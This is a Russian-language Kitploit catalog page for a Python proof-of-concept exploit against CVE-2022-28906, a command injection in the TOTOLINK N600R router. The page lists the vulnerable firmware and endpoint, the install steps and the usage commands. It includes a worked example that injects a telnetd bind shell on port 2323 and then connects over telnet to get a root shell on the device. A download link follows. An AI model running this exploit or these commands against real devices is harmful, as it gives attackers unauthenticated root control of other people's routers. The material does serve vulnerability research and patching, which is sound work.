Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-28906-POC — Python proof-of-concept для неаутентифицированной инъекции OS-команд в TOTOLINK N600R, эксплуатирующий параметр langType для выполнения произвольных команд на устройстве. | Kitploit
Инструменты/GitHubGitHub/finnvle/cve-2022-28906-poc
Безопасность IoTАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийКомандование и УправлениеБезопасность оборудования и IoT
GitHubfinnvle/cve-2022-28906-poc

CVE-2022-28906-POC

Python proof-of-concept для неаутентифицированной инъекции OS-команд в TOTOLINK N600R, эксплуатирующий параметр langType для выполнения произвольных команд на устройстве.

Репозиторий
1822 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-28906 PoC

Python-эксплойт для неаутентифицированной инъекции команд в TOTOLINK N600R.

Python CVSS

Уязвимость

ПродуктTOTOLINK N600R
ПрошивкаV5.3c.7159_B20190425
ТипИнъекция команд ОС (CWE-78)
ПараметрlangType
Конечная точка/cgi-bin/cstecgi.cgi
CVSS v3.19.8 Critical

В TOTOLink N600R V5.3c.7159_B20190425 обнаружена уязвимость инъекции команд через параметр langtype в /setting/setLanguageCfg.

Установка

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

Использование

root@kitploit:~
# Использование: python3 poc.py <ЦЕЛЬ> <КОМАНДА>
# Пример: python3 poc.py 192.168.68.1 "reboot"
# Пример: python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

python3 poc.py <ЦЕЛЬ> <КОМАНДА>

Пример эксплойта

Использование PoC для удалённого выполнения на цели, чтобы включить /bin/sh на порту 2323

root@kitploit:~
python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

Успешный ответ PoC

Проверьте результат, был ли включён порт 2323

Nmap показывает открытый порт 2323

Подключитесь к цели через telnet по порту 2323

root@kitploit:~
telnet 192.168.68.1 2323

Проверка root-оболочки

Ссылки

  • NVD — CVE-2022-28906
  • CVE Record — CVE-2022-28906
  • CWE-78 — Инъекция команд ОС

Отказ от ответственности

Предоставляется как есть, без каких-либо гарантий. Автор не несёт ответственности за неправомерное использование или ущерб.

Скачать инструмент